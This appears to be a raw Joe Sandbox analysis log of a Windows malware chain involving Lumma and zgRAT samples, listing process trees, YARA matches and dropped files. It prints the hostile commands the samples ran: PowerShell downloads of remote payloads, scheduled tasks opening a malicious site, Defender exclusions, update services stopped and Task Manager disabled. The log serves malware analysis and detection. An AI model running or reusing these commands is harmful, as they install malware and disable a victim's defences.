Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005EC520	8_2_005EC520
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005B6690	8_2_005B6690
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005D175D	8_2_005D175D
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005E4720	8_2_005E4720
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005EC860	8_2_005EC860
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005B58F0	8_2_005B58F0
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005D4940	8_2_005D4940
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005B3A40	8_2_005B3A40
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005D0A80	8_2_005D0A80
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005D1B66	8_2_005D1B66
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005B1D02	8_2_005B1D02
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005B6D20	8_2_005B6D20
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005B4E30	8_2_005B4E30
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005DAEC7	8_2_005DAEC7
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005CCF79	8_2_005CCF79
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005D5F62	8_2_005D5F62
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_000DA909	9_2_000DA909
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_000D9910	9_2_000D9910
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_00113048	9_2_00113048
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_000F60A2	9_2_000F60A2
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_000F1512	9_2_000F1512
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_0011763B	9_2_0011763B
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_00118700	9_2_00118700
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_0011775B	9_2_0011775B
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_000D4AD0	9_2_000D4AD0
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_00112BB0	9_2_00112BB0
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_000D4CD0	9_2_000D4CD0
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_000F3D01	9_2_000F3D01
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_000F0D23	9_2_000F0D23
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_00107D63	9_2_00107D63
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_00116EE9	9_2_00116EE9
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00B9E410	11_2_00B9E410
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00BB60A2	11_2_00BB60A2
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00BD8700	11_2_00BD8700
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00B94AD0	11_2_00B94AD0
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00BD2BB0	11_2_00BD2BB0
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00B94CD0	11_2_00B94CD0
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00BB0D23	11_2_00BB0D23
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00BD6EE9	11_2_00BD6EE9
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00BD3048	11_2_00BD3048
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00BB1512	11_2_00BB1512
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00BD763B	11_2_00BD763B
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00BD775B	11_2_00BD775B
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00BB3D01	11_2_00BB3D01
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00BC7D63	11_2_00BC7D63

Source: Joe Sandbox View	Dropped File: C:\ProgramData\wikombernizc\reakuqnanrkn.exe 677F393462E24FB6DBA1A47B39E674F485450F91DEEE6076CCBAD9FD5E05BD12
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\FirstZ[1].exe 677F393462E24FB6DBA1A47B39E674F485450F91DEEE6076CCBAD9FD5E05BD12
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\lummac2[1].exe DC4F0A8E3D12C98EAC09A42BD976579CCC1851056D9DE447495E8BE7519760ED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process token adjusted: Security

Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: String function: 00BAD569 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: String function: 00BAD554 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: String function: 00BA7F00 appears 123 times
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: String function: 00BAD852 appears 84 times
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: String function: 00BA7840 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: String function: 00BADE90 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: String function: 009EA780 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: String function: 000ED852 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: String function: 000EDE90 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: String function: 000E7F00 appears 123 times
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: String function: 005B8C10 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: String function: 005B9340 appears 141 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3136 -ip 3136

Source: Installer[1].exe.2.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 914 bytes, 1 file, at 0x2c +A "ins.bat", ID 687, number 1, 1 datablock, 0x1503 compression
Source: Installer.exe.2.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 914 bytes, 1 file, at 0x2c +A "ins.bat", ID 687, number 1, 1 datablock, 0x1503 compression

Source: taskweaker[1].exe.2.dr	Static PE information: Number of sections : 12 > 10
Source: taskweaker.exe.2.dr	Static PE information: Number of sections : 12 > 10

Source: 1[1].exe.11.dr	Static PE information: Data appended to the last section found
Source: 1.exe.11.dr	Static PE information: Data appended to the last section found

Source: hsRju5CPK2.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001

Source: 21.2.legs.exe.cc0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000024.00000003.2381126293.000000C000B58000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000024.00000003.2493890877.000000C000B58000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000024.00000003.2443773184.000000C000B58000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research

Source: 1[1].exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 1.exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: hsRju5CPK2.exe	Static PE information: Section: ZLIB complexity 0.9981269211065574
Source: hsRju5CPK2.exe	Static PE information: Section: vlmgqsmh ZLIB complexity 0.994164672484985
Source: axplong.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9981269211065574
Source: axplong.exe.0.dr	Static PE information: Section: vlmgqsmh ZLIB complexity 0.994164672484985

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@135/67@17/22

Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe

Code function: 8_2_005DD1DF CoCreateInstance,

8_2_005DD1DF

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ama[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2448:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2124:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:7208:64:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7416:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Mutant created: \Sessions\1\BaseNamedObjects\07c6bc37dc50874878dcb010336ed906
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4148:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5176:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3136

Source: C:\Users\user\Desktop\hsRju5CPK2.exe

File created: C:\Users\user\AppData\Local\Temp\8254624243

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe

File opened: C:\Windows\system32\a6f83fefe79311cddcafce47679d7acec60a021101c3dc053d69833b3db58c52AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Source: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe

Process created: C:\Windows\System32\cmd.exe cmd /c ins.bat

Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\hsRju5CPK2.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\hsRju5CPK2.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ama.exe, 00000004.00000002.2393678580.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002E23000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: hsRju5CPK2.exe	Virustotal: Detection: 55%
Source: hsRju5CPK2.exe	ReversingLabs: Detection: 45%

Source: hsRju5CPK2.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\hsRju5CPK2.exe

File read: C:\Users\user\Desktop\hsRju5CPK2.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\hsRju5CPK2.exe "C:\Users\user\Desktop\hsRju5CPK2.exe"
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Process created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe "C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe "C:\Users\user\AppData\Local\Temp\1000007001\ama.exe"
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe "C:\Users\user\AppData\Local\Temp\1000035001\gold.exe"
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe "C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe "C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe "C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe"
Source: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ins.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://starjod.xyz/Website.php
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://starjod.xyz/Website.php
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000092001\legs.exe "C:\Users\user\AppData\Local\Temp\1000092001\legs.exe"
Source: C:\Users\user\AppData\Local\Temp\1000092001\legs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000092001\legs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3136 -ip 3136
Source: C:\Users\user\AppData\Local\Temp\1000092001\legs.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3136 -s 264
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Process created: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe "C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe"
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=1844,i,8972611737897508834,4615011947215389574,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1976,i,13008057161343220157,61792312660998642,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe "C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\install.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "Cleaner" /tr "C:\Users\user\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\user\AppData\Local\Corporation.zip'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\reg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Process created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe "C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe "C:\Users\user\AppData\Local\Temp\1000007001\ama.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe "C:\Users\user\AppData\Local\Temp\1000035001\gold.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe "C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe "C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe "C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000092001\legs.exe "C:\Users\user\AppData\Local\Temp\1000092001\legs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe "C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
